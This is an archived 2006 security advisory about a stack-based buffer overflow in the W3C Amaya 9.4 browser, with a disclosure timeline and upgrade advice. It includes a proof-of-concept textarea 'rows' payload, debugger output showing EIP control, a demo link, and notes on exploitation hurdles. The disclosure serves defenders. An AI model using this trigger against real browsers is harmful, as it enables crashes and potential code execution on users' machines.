TUCoPS :: HP Unsorted A :: b06-1578.htm

TUCoPS :: HP Unsorted A :: b06-1578.htm
Amaya 9.4 stack based buffer overflow vulnerability
Stack Based Buffer Overflow Vulnerability in Amaya 9.4 Stack Based Buffer Overflow Vulnerability in Amaya 9.4

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

 ---------------------------------------------------
| BuHa Security-Advisory #10    |    Apr 12th, 2006 |
 ---------------------------------------------------
| Vendor   | W3C's Amaya                            |
| URL | http://www.w3.org/Amaya/ | 
| Version  | <= 9.4                                 |
| Risk     | Critical (Remote Code Execution)       |
 ---------------------------------------------------

o Description:
============
The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the "Amaya Overview" page [1] for more details.

o Stack overflow:
===============
Both of the two below posted code snippets (in fact there are dozens
of possible snippets but all of them trigger the same bug) force
Amaya 9.4 to crash:
> 
>  [...]
> 
After the first glance at the generated error report and respectively
the ASM code during the access violation I thought I came across a
heap based buffer overflow.

> eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
> edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000  efl=00010206
>
>         004edd61 03f3             add     esi,ebx
>         004edd63 a4               movsb
>         004edd64 8b4500           mov     eax,[ebp]
>         004edd67 8b8c241c010000   mov     ecx,[esp+0x11c]
>         004edd6e 8b942418010000   mov     edx,[esp+0x118]
>         004edd75 50               push    eax
>         004edd76 51               push    ecx
>         004edd77 53               push    ebx
>         004edd78 52               push    edx
>         004edd79 e8a23c0200       call    amaya+0x111a20 (00511a20)
>         004edd7e 53               push    ebx
>         004edd7f e83cf90000       call    amaya+0xfd6c0 (004fd6c0)
>         004edd84 83c428           add     esp,0x28
>         004edd87 8bbc24fc000000   mov     edi,[esp+0xfc]
>         004edd8e 8b942400010000   mov     edx,[esp+0x100]
> FAULT ->004edd95 8b4240           mov     eax,[edx+0x40]
>                                           ds:0023:41414181=????????
>         004edd98 83f844           cmp     eax,0x44
>         004edd9b 0f8527030000     jne     amaya+0xee0c8 (004ee0c8)
>         004edda1 837c242457       cmp     dword ptr [esp+0x24],0x57
>         004edda6 0f8465060000     je      amaya+0xee411 (004ee411)
>         004eddac 8b4500           mov     eax,[ebp]
>         004eddaf 8b8c2408010000   mov     ecx,[esp+0x108]
>         004eddb6 6aff             push    0xff
>         004eddb8 50               push    eax
>         004eddb9 51               push    ecx
>         004eddba 57               push    edi
>         004eddbb e8d33af1ff       call    amaya+0x1893 (00401893)
>         004eddc0 83c410           add     esp,0x10
>         004eddc3 5f               pop     edi
>         004eddc4 5e               pop     esi
>         004eddc5 5d               pop     ebp

After a second, more precise look, the evitable heap overflow turned
out to be a stack based overflow..

We are able to control the EIP:
> <textarea rows> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>

> eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
> esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000

> Function: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???

Online-demo:
<a href="http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html">http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html</a> 

In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:
====================
21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:
=========
Upgrade to the latest version of Amaya. [2]

o Credits:
========
Thomas Waldegger <a href="mailto:bugtraq@morph3us.org"><bugtraq@morph3us.org></a> 
BuHa-Security Community - <a href="http://buha.info/board/">http://buha.info/board/</a> 

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address <a href="mailto:bugtraq@morph3us.org">'bugtraq@morph3us.org'</a> is more a 
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
<a href="http://morph3us.org/">http://morph3us.org/</a> to contact me. 

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:
<a href="http://morph3us.org/advisories/20060412-amaya-94.txt">http://morph3us.org/advisories/20060412-amaya-94.txt</a> 

[1] <a href="http://www.w3.org/Amaya/Amaya.html">http://www.w3.org/Amaya/Amaya.html</a> 
[2] <a href="http://www.w3.org/Amaya/User/BinDist.html">http://www.w3.org/Amaya/User/BinDist.html</a> 

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: <a href="http://morph3us.org/">http://morph3us.org/</a> 

iD8DBQFEPYALkCo6/ctnOpYRA5yzAJ9j/ki1dPCxPToftjLYHTUkCoGzyACfffaM
zCHSYS6ScvGJcRjuzqovGv4=wD6S
-----END PGP SIGNATURE-----

</b></font></pre></tt></body></html>


<!-- google_ad_section_end -->
<p><center>

<p></center>
<center><a href="/firefox.htm">TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).</a></center>
<font size=1><center>Site design & layout copyright © 1986-2024 AOH</font>
</center>
<br><center><IMG SRC="http://artofhacking.com/cgi-bin/sc/sc.cgi?acct=tucops&font=payphone-med"></center>
<p>
</body>
</html>